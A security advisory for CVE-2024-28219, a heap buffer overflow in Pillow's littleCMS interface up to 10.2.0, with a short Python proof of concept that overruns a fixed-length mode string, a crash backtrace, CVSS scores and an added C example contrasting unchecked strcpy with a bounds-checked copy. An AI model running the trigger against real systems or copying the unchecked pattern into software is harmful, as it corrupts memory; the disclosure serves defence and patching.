Python: Heap buffer overflow in a Pillow (PIL fork) interface to the littleCMS ICC Color Management System

Moderate
rcorrea35 published GHSA-38jg-4f6j-rq6x May 1, 2024

Package

Pillow (PIL fork) (Python)

Affected versions

<= 10.2.0

Patched versions

10.3.0

Description

Summary

Two strcpy calls in the cms_transform_new function of _imagingcms.c could copy more data than the fixed-length destination strings can hold.

Severity

Medium

Proof of Concept

from PIL.ImageCms import ImageCmsTransform
from PIL import ImageCms

# Grayscale ICC profiles; download links are given under "Further Analysis" below.
p1 = ImageCms.getOpenProfile("sGrey-v2-nano.icc")
p2 = ImageCms.getOpenProfile("sGrey-v2-micro.icc")
# A 12-character outMode is longer than the fixed-length mode string that
# cms_transform_new copies into with strcpy, so the copy overruns the buffer.
t = ImageCms.buildTransform(p2, p1, "L;16", "E"*12)
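The overflow the summary describes and the PoC triggers, reduced to its core, as an added example (not Pillow's own code or its 10.3.0 fix): a transform object with fixed-length mode strings, the unchecked strcpy pattern, and a hardened setter that rejects modes that do not fit. The struct, the buffer size of 8 and the function names are assumptions for illustration only.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the transform object: two fixed-length mode
 * strings, as described in the advisory. The size 8 is an assumption for
 * this example and is not taken from Pillow's source. */
#define MODE_LEN 8

typedef struct {
    char mode_in[MODE_LEN];
    char mode_out[MODE_LEN];
} cms_transform_t;

/* Vulnerable pattern: strcpy() trusts the caller-supplied mode strings and
 * writes past the buffer whenever one is MODE_LEN bytes or longer.
 * Shown for comparison only; it is never called in this example. */
void set_modes_unchecked(cms_transform_t *t, const char *in_mode, const char *out_mode) {
    strcpy(t->mode_in, in_mode);
    strcpy(t->mode_out, out_mode);
}

/* Hardened form: a mode must fit together with its NUL terminator, so its
 * length must be strictly less than MODE_LEN. Return -1 on rejection so the
 * caller can report an error (in Pillow, a Python exception) instead of
 * corrupting the heap. */
int set_modes_checked(cms_transform_t *t, const char *in_mode, const char *out_mode) {
    size_t in_len = strlen(in_mode);
    size_t out_len = strlen(out_mode);
    if (in_len >= MODE_LEN || out_len >= MODE_LEN) {
        return -1;
    }
    /* Lengths verified above, so both copies stay inside the buffers. */
    memcpy(t->mode_in, in_mode, in_len + 1);
    memcpy(t->mode_out, out_mode, out_len + 1);
    return 0;
}

int main(void) {
    cms_transform_t t;
    /* The PoC's arguments: a 4-byte inMode and a 12-byte outMode ("E" * 12). */
    printf("L;16 / EEEEEEEEEEEE -> %d\n", set_modes_checked(&t, "L;16", "EEEEEEEEEEEE"));
    printf("L;16 / RGB          -> %d\n", set_modes_checked(&t, "L;16", "RGB"));
    return 0;
}
```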

Further Analysis

The grayscale ICC profiles used in the PoC can be downloaded from:
https://github.com/saucecontrol/Compact-ICC-Profiles/blob/master/profiles/sGrey-v2-micro.icc?raw=true
https://github.com/saucecontrol/Compact-ICC-Profiles/blob/master/profiles/sGrey-v2-nano.icc?raw=true

Backtrace

gef➤  backtrace 
#0  0x00007ffff6f7dae9 in cmsDeleteTransform () from /lib/x86_64-linux-gnu/liblcms2.so.2
#1  0x00007ffff75ed9bd in ?? () from /usr/lib/python3/dist-packages/PIL/_imagingcms.cpython-311-x86_64-linux-gnu.so
#2  0x000000000055498b in ?? ()
#3  0x00000000004dcb1e in ?? ()
#4  0x000000000060d494 in ?? ()
#5  0x00000000004cc9d7 in ?? ()
#6  0x000000000060cd25 in ?? ()
#7  0x00000000005f44d8 in Py_FinalizeEx ()
#8  0x0000000000603ec5 in Py_RunMain ()
#9  0x00000000005c907b in Py_BytesMain ()
#10 0x00007ffff7cc26ca in __libc_start_call_main (main=main@entry=0x5c8fe0, argc=argc@entry=0x2, argv=argv@entry=0x7fffffffd9e8) at ../sysdeps/nptl/libc_start_call_main.h:58
#11 0x00007ffff7cc2785 in __libc_start_main_impl (main=0x5c8fe0, argc=0x2, argv=0x7fffffffd9e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffd9d8) at ../csu/libc-start.c:360
#12 0x00000000005c8f11 in _start ()

Vendor's advisory
https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html#cve-2024-28219-fix-buffer-overflow-in-imagingcms-c

Timeline

Date reported: 2/19/2024
Date fixed: 4/01/2024
Date disclosed: 4/01/2024

Severity

Moderate

CVSS v3 base metrics

Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-28219

Weaknesses

No CWEs

Credits